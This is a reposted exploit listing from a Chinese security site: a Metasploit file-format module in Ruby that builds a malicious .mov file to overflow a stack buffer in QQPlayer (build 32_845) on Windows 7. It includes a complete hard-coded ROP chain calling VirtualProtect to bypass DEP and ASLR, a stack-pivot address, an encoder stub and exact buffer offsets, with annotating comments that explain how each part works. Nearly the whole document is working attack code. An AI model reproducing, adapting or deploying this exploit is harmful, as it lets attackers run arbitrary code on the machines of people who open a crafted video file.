
QQPLAYER WIN7下PICT PnSize DEP_ASLR BYPASS缓冲溢出漏洞

2011/11/25 作者:不详 来源: 华盟收集

# Exploit Title: QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS
# Date: 2011,11,21
# Author: hellok
# Software Link: http://dl_dir.qq.com/invc/qqplayer/QQPlayer_Setup_32_845.exe
# Version: 32_845 (latest at time of writing)
# Tested on: WIN7
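# Doubled quotes in the scraped listing ('') were an extraction artifact; the
# original module loads the Metasploit core like every other Msf module.
require 'msf/core'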
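class Metasploit3 < Msf::Exploit::Remote
    include Msf::Exploit::FILEFORMAT

    # Metasploit file-format module: writes a .mov whose trailing data triggers
    # a stack buffer overflow in QQPlayer's PICT PnSize handling (the template
    # file it appends to is Metasploit's CVE-2011-0257 QuickTime PnSize .mov).
    #
    # DEP/ASLR on Windows 7 are bypassed by overwriting the saved return address
    # with a stack pivot (target.ret) that lands in a mona.py-generated ROP chain
    # calling VirtualProtect() on the stack, after which a `call esp` gadget
    # transfers control to the encoded payload. Every gadget, the pivot and the
    # VirtualProtect import slot are hard-coded for QQPlayer build 32_845 and
    # the DLLs it ships (avformat-52.dll, avutil-49.dll, i18nu.dll); any other
    # build needs the chain regenerated (`!mona rop`).
    #
    # The scraped listing had every single quote doubled ('') — an extraction
    # artifact that made the file unparseable; it is restored here.
    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'QQPLAYER PICT PnSize Buffer Overflow WIN7 DEP_ASLR BYPASS',
            'Description'    => %q{
                    This module exploits a vulnerability in QQPLAYER Player 3.2.
                When opening a .mov file containing a specially crafted PnSize value, an attacker
                may be able to execute arbitrary code.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'hellok',  # special thanks to corelanc0d3r for 'mona'
                ],
            'References'     =>
                [
                    # NOTE(review): no advisory or CVE for the QQPlayer bug itself is
                    # cited; the reused template file is from CVE-2011-0257 (QuickTime).
                ],
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                    'DisablePayloadHandler' => 'true',
                },
            'Payload'        =>
                {
                    # Payload is placed right after the 108-byte ROP chain at offset 90 of
                    # the overflow buffer and must fit below the pivot at offset 2306.
                    'Space'          => 750,
                    'BadChars'       => "",  # Memcpy: no byte values are filtered
                    # Upper-case alphanumeric encoding; the alphanum decoder needs ECX to
                    # point at the encoded bytes, which the PrependEncoder stub provides:
                    #   eb 03            jmp  +3
                    #   59               pop  ecx           ; ecx = address after the stub
                    #   eb 05            jmp  +5            ; into the encoded payload
                    #   e8 f8 ff ff ff   call -8            ; pushes that address, lands on pop ecx
                    'EncoderType'    => Msf::Encoder::Type::AlphanumUpper,
                    'DisableNops'    => true,  # was the string 'True'; truthy either way
                    'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
                    'EncoderOptions' =>
                        {
                            'BufferRegister' => 'ECX',
                        },
                },
            'Platform' => 'win',
            'Targets'        =>
                [
                    # Ret = stack pivot written over the saved return address; the module
                    # it lives in is assumed not to be randomized — verify per build.
                    [ 'Windows 7', { 'Ret' => 0x67664cde } ],
                ],
            'Privileged'     => false,
            'DisclosureDate' => '11 21 2011',
            'DefaultTarget'  => 0))

        register_options(
            [
                OptString.new('FILENAME',   [ false, 'The file name.',  'msf.mov' ]),
            ], self.class)
    end

    # Builds and writes the malicious .mov.
    #
    # Appended overflow buffer layout (offsets relative to its start):
    #   [0, 90)       random upper-case filler
    #   [90, 198)     ROP chain (27 little-endian dwords)
    #   [198, ...)    encoded payload (<= 750 bytes, see 'Space')
    #   ...           filler up to offset 2306
    #   [2306, 2310)  stack pivot (target.ret) over the saved return address
    #   [2310, 5310)  3000 bytes of trailing filler
    #
    # Raises if the chain plus payload would run past the pivot offset (the
    # original silently built a file with the pivot in the wrong place).
    def exploit
        # !mona rop
        # Standard mona VirtualProtect chain: after PUSHAD # RETN the stack holds
        # EDI(ret-nop) ESI(VirtualProtect) EBP(call esp) ESP EBX(size) EDX(0x40)
        # ECX(lpOldProtect) EAX(nops), so VirtualProtect(esp, 0x331, 0x40, ptr) runs
        # and returns into `call esp`, i.e. the now-executable payload.
        rop_gadgets =
        [
            # Prologue: the POP ECX consumes 0x12345678, then control returns to
            # 0x67664CE4 (same module as the pivot); the four dwords after it look
            # like padding that gadget skips over — unverified, check the binary.
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x12345678,
            0x67664CE4,
            0x01020304,
            0x10203040,
            0x22331122,
            0x23456789,

            # Resolve VirtualProtect: read its import slot into EAX, move to ESI.
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x00a9c18c, # <- *&VirtualProtect()  (import slot in QQPlayer.exe)
            0x0054f100, # MOV EAX,DWORD PTR DS:[ECX] # RETN (QQPlayer.exe)
            #0x008e750c, LEA ESI,EAX # RETN (QQPlayer.exe)
            0x008cf099, # XCHG EAX,ESI # RETN

            # Load the remaining registers for the PUSHAD call frame.
            0x6497aaad, # POP EBP # RETN (avformat-52.dll)
            0x100272bf, # ptr to 'call esp' (from i18nu.dll) — VirtualProtect's return address
            0x005fc00b, # POP EBX # RETN (QQPlayer.exe)
            0x00000331, # dwSize: change size to mark as executable if needed (-> ebx)
            0x00418007, # POP ECX # RETN (QQPlayer.exe)
            0x63d18000, # RW pointer (lpOldProtect) (-> ecx)
            0x63d05001, # POP EDI # RETN (avutil-49.dll)
            0x63d05002, # ROP NOP (-> edi)
            0x008bf00b, # POP EDX # RETN (QQPlayer.exe)
            0x00000040, # newProtect (0x40 = PAGE_EXECUTE_READWRITE) (-> edx)
            0x00468800, # POP EAX # RETN (QQPlayer.exe)
            0x90909090, # NOPS (-> eax)
            0x008bad5c, # PUSHAD # RETN (QQPlayer.exe)
        # rop chain generated by mona.py
        # note : this chain may not work out of the box
        # you may have to change order or fix some gadgets,
        # but it should give you a head start
        ].pack("V*")

        # Explicit little-endian dword, same as the chain above (the original
        # used pack('L'), which is host-endian and only coincidentally correct).
        stackpivot = [target.ret].pack('V')

        pivot_offset = 2306

        buffer = rand_text_alpha_upper(90)
        buffer << rop_gadgets
        buffer << payload.encoded

        # 'Space' => 750 should keep this non-negative; fail loudly rather than
        # emit a file whose pivot is misplaced.
        junk_len = pivot_offset - buffer.length
        if junk_len < 0
            raise ArgumentError, "ROP chain plus payload (#{buffer.length} bytes) overruns the pivot offset (#{pivot_offset})"
        end

        buffer << rand_text_alpha_upper(junk_len)
        buffer << stackpivot
        buffer << rand_text_alpha_upper(3000)

        # Template .mov from the Metasploit data directory (CVE-2011-0257, the
        # QuickTime PnSize bug); the overflow buffer is appended to it verbatim.
        path = File.join(Msf::Config.install_root, "data", "exploits", "CVE-2011-0257.mov")
        sploit = File.binread(path)

        sploit << buffer

        file_create(sploit)
    end
end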